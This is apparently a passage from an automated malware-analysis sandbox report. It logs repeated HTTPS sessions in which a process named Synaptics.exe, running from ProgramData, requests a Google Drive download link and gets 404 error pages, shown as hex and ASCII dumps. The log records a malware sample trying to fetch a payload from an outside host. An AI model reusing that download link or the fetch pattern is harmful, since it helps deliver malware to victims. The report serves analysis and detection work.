                                                                                                                                                                                        2022-05-17 11:31:41 UTC289INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:41 UTC289INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 2b 62 62 4a 70 39 67 56 4d 4a 4b 75 38 38 57 6e 48 46 47 31 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="r+bbJp9gVMJKu88WnHFG1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:41 UTC290INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:41 UTC290INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        95192.168.2.349850142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:41 UTC287OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:41 UTC291INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:41 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-/vmt5aDCe2wfgOI7aS9+AA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:41 UTC292INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 59 6b 6f 74 33 70 72 65 30 52 43 51 7a 59 76 53 77 49 35 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xYkot3pre0RCQzYvSwI5GA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:41 UTC293INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:41 UTC294INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        96192.168.2.349851142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:41 UTC290OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:41 UTC294INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:41 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-UZ5qWC0ljpBak5aPHb0k2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:41 UTC295INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:41 UTC295INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4a 69 53 67 70 64 68 45 79 49 76 62 2f 6d 47 32 74 2b 50 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jJiSgpdhEyIvb/mG2t+PkA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:41 UTC296INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:41 UTC297INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        97192.168.2.349852142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:41 UTC294OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:41 UTC297INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:41 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8sgY9maDLSbvtmDNw+qkBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:41 UTC298INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 75 57 33 63 51 51 76 78 69 5a 46 69 68 58 41 56 4c 30 31 4a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VuW3cQQvxiZFihXAVL01JA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:41 UTC300INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:41 UTC300INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        98192.168.2.349853142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:41 UTC297OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:41 UTC300INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:41 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-XBWkPW2f+YP+4LKBDxPYYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:41 UTC301INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 53 73 68 72 31 6b 7a 6b 4c 33 6b 51 59 59 64 43 64 2b 51 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aSshr1kzkL3kQYYdCd+QXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:41 UTC303INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:41 UTC303INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        99192.168.2.349854142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:41 UTC300OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:42 UTC303INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:42 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9xGR97D0+xDT3HvwX1GMww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:42 UTC304INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
